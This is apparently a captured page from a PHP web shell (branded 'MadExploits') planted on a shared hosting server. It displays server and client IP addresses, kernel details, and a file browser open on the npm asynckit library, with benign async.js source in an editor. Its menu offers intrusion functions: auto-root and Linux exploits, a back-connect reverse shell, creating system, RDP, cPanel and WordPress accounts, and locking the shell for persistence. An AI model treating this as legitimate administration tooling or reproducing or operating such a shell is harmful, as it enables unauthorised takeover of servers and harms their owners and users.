Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.138.137.199
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
asynckit /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
abort.js
497
B
-rw-r--r--
async.js
599
B
-rw-r--r--
defer.js
441
B
-rw-r--r--
iterate.js
1.75
KB
-rw-r--r--
readable_asynckit.js
1.57
KB
-rw-r--r--
readable_parallel.js
673
B
-rw-r--r--
readable_serial.js
655
B
-rw-r--r--
readable_serial_ordered.js
941
B
-rw-r--r--
state.js
941
B
-rw-r--r--
streamify.js
2.89
KB
-rw-r--r--
terminator.js
533
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : async.js
var defer = require('./defer.js'); // API module.exports = async; /** * Runs provided callback asynchronously * even if callback itself is not * * @param {function} callback - callback to invoke * @returns {function} - augmented callback */ function async(callback) { var isAsync = false; // check if async happened defer(function() { isAsync = true; }); return function async_callback(err, result) { if (isAsync) { callback(err, result); } else { defer(function nextTick_callback() { callback(err, result); }); } }; }
Close